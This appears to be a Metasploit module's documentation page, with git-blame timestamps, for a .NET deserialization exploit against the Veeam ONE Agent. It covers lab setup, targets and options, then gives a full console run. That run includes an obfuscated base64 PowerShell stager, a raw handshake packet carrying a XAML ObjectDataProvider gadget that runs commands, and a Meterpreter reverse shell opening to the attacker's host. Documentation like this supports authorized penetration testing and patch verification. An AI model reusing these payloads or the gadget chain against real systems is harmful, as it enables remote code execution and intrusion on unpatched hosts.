2020-04-28 01:20:24 -05:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
|
|
|
|
### Description
|
|
|
|
|
|
2020-04-28 12:48:32 -05:00
|
|
|
This module exploits a .NET deserialization vulnerability in the Veeam
|
|
|
|
|
ONE Agent before the hotfix versions 9.5.5.4587 and 10.0.1.750 in the
|
|
|
|
|
9 and 10 release lines.
|
2020-04-28 01:20:24 -05:00
|
|
|
|
|
|
|
|
Specifically, the module targets the `HandshakeResult()` method used by
|
|
|
|
|
the Agent. By inducing a failure in the handshake, the Agent will
|
|
|
|
|
deserialize untrusted data.
|
|
|
|
|
|
|
|
|
|
Tested against the pre-patched release of 10.0.0.750. Note that Veeam
|
|
|
|
|
continues to distribute this version but with the patch pre-applied.
|
|
|
|
|
|
|
|
|
|
### Setup
|
|
|
|
|
|
|
|
|
|
1. Download the [pre-patched 10.0.0.750 ISO](https://download2.veeam.com/VeeamONE.10.0.0.750.iso)
|
|
|
|
|
2. Mount the ISO in a 64-bit copy of Windows (I used Windows 10 x64)
|
|
|
|
|
3. Run `Setup.exe` and follow the prompts to install the software
|
|
|
|
|
|
|
|
|
|
You can reference Veeam's [quick start guide](https://helpcenter.veeam.com/docs/one/qsg/installation.html?ver=100).
|
|
|
|
|
|
|
|
|
|
The service may take up to several minutes to start, even if you can
|
|
|
|
|
connect to it, so please be patient.
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
Follow [Setup](#setup) and [Scenarios](#scenarios).
|
|
|
|
|
|
|
|
|
|
## Targets
|
|
|
|
|
|
|
|
|
|
### 0
|
|
|
|
|
|
|
|
|
|
This executes a Windows command.
|
|
|
|
|
|
|
|
|
|
### 1
|
|
|
|
|
|
|
|
|
|
This uses a Windows dropper to execute code.
|
|
|
|
|
|
|
|
|
|
### 2
|
|
|
|
|
|
|
|
|
|
This uses a PowerShell stager to execute code.
|
|
|
|
|
|
2020-05-01 12:59:01 -05:00
|
|
|
## Options
|
|
|
|
|
|
|
|
|
|
### HOSTINFO_NAME
|
|
|
|
|
|
|
|
|
|
This is the name sent in the host info packet to the server. It must be
|
|
|
|
|
recognized by the server. You shouldn't need to change this, but you may
|
|
|
|
|
if your environment is different.
|
|
|
|
|
|
2020-04-28 01:20:24 -05:00
|
|
|
## Scenarios
|
|
|
|
|
|
|
|
|
|
### Veeam ONE Agent 10.0.0.750 on Windows 10 x64
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
msf5 > use exploit/windows/misc/veeam_one_agent_deserialization
|
|
|
|
|
msf5 exploit(windows/misc/veeam_one_agent_deserialization) > options
|
|
|
|
|
|
|
|
|
|
Module options (exploit/windows/misc/veeam_one_agent_deserialization):
|
|
|
|
|
|
2020-05-01 12:59:01 -05:00
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
|
|
|
|
HOSTINFO_NAME AgentController yes Name to send in host info (must be recognized by server!)
|
|
|
|
|
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
|
|
|
|
RPORT 2805 yes The target port (TCP)
|
|
|
|
|
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
|
|
|
|
|
SRVPORT 8080 yes The local port to listen on.
|
|
|
|
|
SSL false no Negotiate SSL for incoming connections
|
|
|
|
|
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
|
|
|
|
URIPATH no The URI to use for this exploit (default is random)
|
2020-04-28 01:20:24 -05:00
|
|
|
|
|
|
|
|
|
|
|
|
|
Payload options (windows/x64/meterpreter/reverse_tcp):
|
|
|
|
|
|
|
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
|
|
|
|
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
|
|
|
|
LHOST yes The listen address (an interface may be specified)
|
|
|
|
|
LPORT 4444 yes The listen port
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Exploit target:
|
|
|
|
|
|
|
|
|
|
Id Name
|
|
|
|
|
-- ----
|
|
|
|
|
2 PowerShell Stager
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
msf5 exploit(windows/misc/veeam_one_agent_deserialization) > set rhosts 172.16.249.150
|
|
|
|
|
rhosts => 172.16.249.150
|
|
|
|
|
msf5 exploit(windows/misc/veeam_one_agent_deserialization) > set lhost 172.16.249.1
|
|
|
|
|
lhost => 172.16.249.1
|
|
|
|
|
msf5 exploit(windows/misc/veeam_one_agent_deserialization) > run
|
|
|
|
|
|
|
|
|
|
[*] Started reverse TCP handler on 172.16.249.1:4444
|
|
|
|
|
[*] 172.16.249.150:2805 - Connecting to 172.16.249.150:2805
|
|
|
|
|
[*] 172.16.249.150:2805 - Sending host info to 172.16.249.150:2805
|
|
|
|
|
[+] 172.16.249.150:2805 - --> Host info packet: "\x05\x02\x0FAgentController"
|
|
|
|
|
[+] 172.16.249.150:2805 - <-- Host info reply: "\x03\x02\x00"
|
|
|
|
|
[*] 172.16.249.150:2805 - Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
|
|
|
|
|
[*] 172.16.249.150:2805 - Powershell command length: 2506
|
2020-08-14 13:11:38 -05:00
|
|
|
[*] 172.16.249.150:2805 - Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPbHp14CA7VWa2+bSBT9nEj5D6iyZFAcG7tOmo1UacGGGNekpgTbsWutMIxh6mEgMMQm3f73vWNDmm7T3XalRUjM4z7PPTOXdU49hmMqkAvh88nx0dhN3UgQa+jCbAi1RNcd6egI1mu73QpdCm8FcaEkST+OXEyXV1e9PE0RZYd58xoxJctQtCIYZaIk/ClMQ5Sis/erT8hjwmeh9kfzmsQrl5RiRc/1QiScKdTne6PYc3kwTTshmIn1jx/r0uKsvWxq97lLMrFuFxlDUdMnpC4JXyTu8LZIkFg3sZfGWbxmzSmmrztNh2buGt2AtQdkIhbGflaXIA14U8TylAqHhLiFw75Yh+E4jT3F91OUZfWGsOC2F8vl7+KidPwhpwxHqGlQhtI4sVH6gD2UNQcu9Qn6gNZL0LJZimmwlCQQe4g3SKzRnJCG8CtmxBu0rWD7WSXxuRJIjVkqNaCULyVqxn5O0EG1/kKkvP4SPBUHALsvJ8cnx+uKLnl4/5wvMDpa7McIohPHcYb3Ym8FuSGY4MZlcVrAtHab5khaPmEr1ArLafxYvV3JguSK0PEA1haTGPtL0CkrWgu9aYev/5iZfbTGFPUL6kbYq8gnvoQyWhO0T7FZid1AVGK93EB+HxEUuIzDxov9nZoWYfakq+aY+ChVPKhUBlFBEaVvgzlUQqwb1EQRYHSYA/tqa6A8qqRLmheVdz4HoXqPuFnWEMY5nDmvIdjIJchvCArNcLml5CzeD+tfwzVzwrDnZqwyt5QqHEt/vZhmLM09KBvkfmsnyMMu4VA0hAH2kVrYOKj81l8EoucSAgcBLD1AIWCFA2AzToYUQuSFl5o2YkaUEBSByP7s68QN4KSXbN+Txw2QX/97gBWZD8zlUFQYPAsP6muTmDWECU4ZXCEc1j2L/pP7Z5fHPpBeispKiNX5WKgF47Su7db3JOCcLHHZo5AyQEBP40h1M3TRPVwU4quWhvvn4378qMCj6R+siWo7k7lh+kNiG8y+0/DICUMDt40A5oWjBWMmJ+9ubwdDuz9Q0v4uXCtGZmgDtbDaquIN8JvJUHUc0MO9kfVpZyi+GgWz4K63NcbhzABHvVFgBPBVjdBT5bkcqLLeG9lqqGFZCWxrYHXbc6N1SVT8aBu2Mpg++Xvyo3W7g9nuVrkxh0qov/f1dkff62+4/nxzPepr+7nH59ZdpmEN/Gj6nTUJ0XSSqFNNn1uTxAhOt4E1GbW6eqjCuoF3o8RuwdNuDx+o/2iSy0cTwrUm8yFGcyNARaBYimLfUWKvtj1F1b1U7Z8rju7A2ubWoDtrlZh+cTdo/TYxMUpixdIURSdwJiPF3fZb7Wn8zpqcW44m7wpH3m21T62thofbTfl1ri8ugta6O25NbIMO3FCFeIthd4OHp7AXuRP5bt2acPz6Gm090hlxx712TFattoP7b1TVwGh4Y3rkXoWcwca5tYp7HS9cQ0xGcGkFs5h23A3YnQYKRAf5QZ3XQwN01JzgjXM647aGWzka7mQeZzS8hNg6ZQwKo8asBfEpg77do9e2Mev4SFdbp97bV5y0wNpaFD642TMy/qiVmG6ahS4BkkKLqK4GPU718tYfx5hriCL8LGxQShGBVgvNuDpeCiGxx3sO7w7Q7g5NiPdEB4avOy+OJOFJUPraiaqlq6s5hAjHdX+gmiNEAxY25N1rWYbOIu+6MiT583n14qQQD7YavDUdoHkyT/bmJX6Sa/f3xv8JWXl5hPDx/wWyr2v/sPtTMMqNMuHv1r9d+CVMfzHxqYsZyNlw9RF0aL4v5l+y49nPCVQEKr8uH/57+T5nZzfwy3Jy/BfBhjzkyAoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
|
2020-04-28 01:20:24 -05:00
|
|
|
[*] 172.16.249.150:2805 - Sending malicious handshake to 172.16.249.150:2805
|
|
|
|
|
[+] 172.16.249.150:2805 - --> Handshake packet: "\x9E\f\x00\x00\a\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF\x01\x00\x00\x00\x00\x00\x00\x00\f\x02\x00\x00\x00^Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\x05\x01\x00\x00\x00BMicrosoft.VisualStudio.Text.Formatting.TextFormattingRunProperties\x01\x00\x00\x00\x0FForegroundBrush\x01\x02\x00\x00\x00\x06\x03\x00\x00\x00\xBC\x17<ResourceDictionary xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\" xmlns:X=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns:S=\"clr-namespace:System;assembly=mscorlib\" xmlns:D=\"clr-namespace:System.Diagnostics;assembly=system\"><ObjectDataProvider X:Key=\"\" ObjectType=\"{X:Type D:Process}\" MethodName=\"Start\"><ObjectDataProvider.MethodParameters><S:String>cmd</S:String><S:String>/c powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPbHp14CA7VWa2+bSBT9nEj5D6iyZFAcG7tOmo1UacGGGNekpgTbsWutMIxh6mEgMMQm3f73vWNDmm7T3XalRUjM4z7PPTOXdU49hmMqkAvh88nx0dhN3UgQa+jCbAi1RNcd6egI1mu73QpdCm8FcaEkST+OXEyXV1e9PE0RZYd58xoxJctQtCIYZaIk/ClMQ5Sis/erT8hjwmeh9kfzmsQrl5RiRc/1QiScKdTne6PYc3kwTTshmIn1jx/r0uKsvWxq97lLMrFuFxlDUdMnpC4JXyTu8LZIkFg3sZfGWbxmzSmmrztNh2buGt2AtQdkIhbGflaXIA14U8TylAqHhLiFw75Yh+E4jT3F91OUZfWGsOC2F8vl7+KidPwhpwxHqGlQhtI4sVH6gD2UNQcu9Qn6gNZL0LJZimmwlCQQe4g3SKzRnJCG8CtmxBu0rWD7WSXxuRJIjVkqNaCULyVqxn5O0EG1/kKkvP4SPBUHALsvJ8cnx+uKLnl4/5wvMDpa7McIohPHcYb3Ym8FuSGY4MZlcVrAtHab5khaPmEr1ArLafxYvV3JguSK0PEA1haTGPtL0CkrWgu9aYev/5iZfbTGFPUL6kbYq8gnvoQyWhO0T7FZid1AVGK93EB+HxEUuIzDxov9nZoWYfakq+aY+ChVPKhUBlFBEaVvgzlUQqwb1EQRYHSYA/tqa6A8qqRLmheVdz4HoXqPuFnWEMY5nDmvIdjIJchvCArNcLml5CzeD+tfwzVzwrDnZqwyt5QqHEt/vZhmLM09KBvkfmsnyMMu4VA0hAH2kVrYOKj81l8EoucSAgcBLD1AIWCFA2AzToYUQuSFl5o2YkaUEBSByP7s68QN4KSXbN+Txw2QX/97gBWZD8zlUFQYPAsP6muTmDWECU4ZXCEc1j2L/pP7Z5fHPpBeispKiNX5WKgF47Su7db3JOCcLHHZo5AyQEBP40h1M3TRPVwU4quWhvvn4378qMCj6R+siWo7k7lh+kNiG8y+0/DICUMDt40A5oWjBWMmJ+9ubwdDuz9Q0v4uXCtGZmgDtbDaquIN8JvJUHUc0MO9kfVpZyi+GgWz4K63NcbhzABHvVFgBPBVjdBT5bkcqLLeG9lqqGFZCWxrYHXbc6N1SVT8aBu2Mpg++Xvyo3W7g9nuVrkxh0qov/f1dkff62+4/nxzPepr+7nH59ZdpmEN/Gj6nTUJ0XSSqFNNn1uTxAhOt4E1GbW6eqjCuoF3o8RuwdNuDx+o/2iSy0cTwrUm8yFGcyNARaBYimLfUWKvtj1F1b1U7Z8rju7A2ubWoDtrlZh+cTdo/TYxMUpixdIURSdwJiPF3fZb7Wn8zpqcW44m7wpH3m21T62thofbTfl1ri8ugta6O25NbIMO3FCFeIthd4OHp7AXuRP5bt2acPz6Gm090hlxx712TFattoP7b1TVwGh4Y3rkXoWcwca5tYp7HS9cQ0xGcGkFs5h23A3YnQYKRAf5QZ3XQwN01JzgjXM647aGWzka7mQeZzS8hNg6ZQwKo8asBfEpg77do9e2Mev4SFdbp97bV5y0wNpaFD642TMy/qiVmG6ahS4BkkKLqK4GPU718tYfx5hriCL8LGxQShGBVgvNuDpeCiGxx3sO7w7Q7g5NiPdEB4avOy+OJOFJUPraiaqlq6s5hAjHdX+gmiNEAxY25N1rWYbOIu+6MiT583n14qQQD7YavDUdoHkyT/bmJX6Sa/f3xv8JWXl5hPDx/wWyr2v/sPtTMMqNMuHv1r9d+CVMfzHxqYsZyNlw9RF0aL4v5l+y49nPCVQEKr8uH/57+T5nZzfwy3Jy/BfBhjzkyAoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"</S:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>\v"
|
|
|
|
|
[+] 172.16.249.150:2805 - <-- Handshake reply: "\x00\x00\x00\x00\xBA\xB0\x8DJ\xA2A\eL\x9E\xD3r\xB4w\xD3\xEFn\x0E\x00\x00\x00\a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00"
|
|
|
|
|
[*] Sending stage (201283 bytes) to 172.16.249.150
|
|
|
|
|
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.150:49725) at 2020-04-28 01:06:47 -0500
|
|
|
|
|
|
|
|
|
|
meterpreter > getuid
|
|
|
|
|
Server username: WINDEV2004EVAL\User
|
|
|
|
|
meterpreter > sysinfo
|
|
|
|
|
Computer : WINDEV2004EVAL
|
|
|
|
|
OS : Windows 10 (10.0 Build 18363).
|
|
|
|
|
Architecture : x64
|
|
|
|
|
System Language : en_US
|
|
|
|
|
Domain : WORKGROUP
|
|
|
|
|
Logged On Users : 21
|
|
|
|
|
Meterpreter : x64/windows
|
|
|
|
|
meterpreter >
|
|
|
|
|
```
|
